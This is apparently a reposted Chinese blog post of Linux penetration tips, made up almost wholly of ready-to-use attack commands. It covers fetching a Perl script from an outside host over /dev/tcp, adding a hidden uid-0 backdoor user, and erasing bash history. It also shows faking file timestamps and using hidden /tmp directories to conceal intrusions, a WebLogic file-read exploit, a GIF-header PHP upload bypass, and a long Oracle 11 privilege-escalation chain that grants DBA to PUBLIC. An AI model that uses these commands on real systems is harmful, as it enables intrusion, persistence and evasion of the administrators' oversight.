送给Linux渗透爱好者的小技巧

1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat<&5 > c.pl

2.Linux添加uid为0的用户useradd -o -u 0 cnbird

3.bash去掉history记录export HISTSIZE=0export HISTFILE=/dev/null

4.SSH反向链接ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口然后服务器上执行ssh localhost -p 44即可

5.weblogic本地读取文件漏洞curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml”

6.apache查看虚拟web目录./httpd -t -D DUMP_VHOSTS

7.cvs渗透技巧CVSROOT/passwd UNIX SHA1的密码文件CVSROOT/readersCVSROOT/writersCVS/Root CVS/Entries 更新的文件和目录内容CVS/Repository

8.Cpanel路径泄露/3rdparty/squirrelmail/functions/plugin.php

9.修改上传文件时间戳(掩盖入侵痕迹)touch -r 老文件时间戳 新文件时间戳

10.利用baidu和google搜索目标主机webshellintitle:PHPJackal 1t1t

11.包总补充创建临时“隐藏”目录 mkdir /tmp/…/tmp/…目录在管理员有宿醉的情况下是“隐藏”的,,可以临时放点exp啥的

12.利用linux输出绕过gif限制的图片printf “GIF89a\x01\x00\x01\x00<?php phpinfo();?>” > poc.php

13.读取环境变量对于查找信息非常有帮助/proc/self/environ

14.最新的Oracle 11提升用户权限(只要session权限)DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登陆权限select * from session_privs;Create SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘GREMLIN(用户名)’;

DESC JAVA$POLICY$

DECLAREPOL DBMS_JVM_EXP.TEMP_JAVA_POLICY;CURSOR C1 IS Select ‘GRANT’ USER(), ‘SYS’, ‘java.io.FilePermission’, ‘<<ALL FILES>>’, ‘execute’, ‘ENABLE’ FROM DUAL;BEGINOPEN C1;FETCH C1 BULK COLLECT INTO POL;CLOSE C1;DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);END;/

connect / as sysdbaCOL TYPE_NAME FOR A30;COL NAME FOR A30;COL_ACTION FOR A10;Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘用户’;

connect 普通用户set serveroutput onexec dbms_java.set_output(10000);

Select DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’, ‘oracle/aurora/rdbms/DbmsJava’, ‘SYS’, ‘writeOutputToFile’, ‘TEXT’, NULL, NULL, NULL, NULL,0,1,1,1,1,0, ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;’BEGIN EXECUTE IMMEDIATE ”GRANT DBA TO 用户”; END;’, ‘BEGIN NULL; END;’) FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(‘NO_SUCH_SUBSCRIPTION’, SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC(‘FOO”||DBMS_JAVA.SET_OUTPUT_TO_SQL(“ID”,”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE””GRANT DBA TO PUBLIC””;DBMS_OUTPUT.PUT_LINE(:1);END;”,”TEXT”)||”BAR’);

Select DBMS_JAVA.RUNJAVA(‘oracle/aurora/util/Test’) FROM DUAL;SET ROLE DBA;

15. webLogic渗透技巧四. Weblogin Script Tool(WLST)

写入到<Domain_home>\\config\\config.xml

1.进行修改:<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh2.启动WLST 【LINUX公社  】java weblogic.WLST

wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001’)wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()wls:/bbk/serverConfig> cd(‘Servers’)wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ‘4’)wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Changewls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()wls:/offline> exit()

3.批处理:保存以上命令为cnbird.pyconnect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001’)cd(‘Servers’)cd(‘Log’)cd(‘Server-cnbird’)startEdit()set(‘FileCount’, ‘4’)save()然后执行java weblogic.WLST cnbird.py

接受失败等于回归真实的自我,

送给Linux渗透爱好者的小技巧

相关文章:

你感兴趣的文章:

标签云: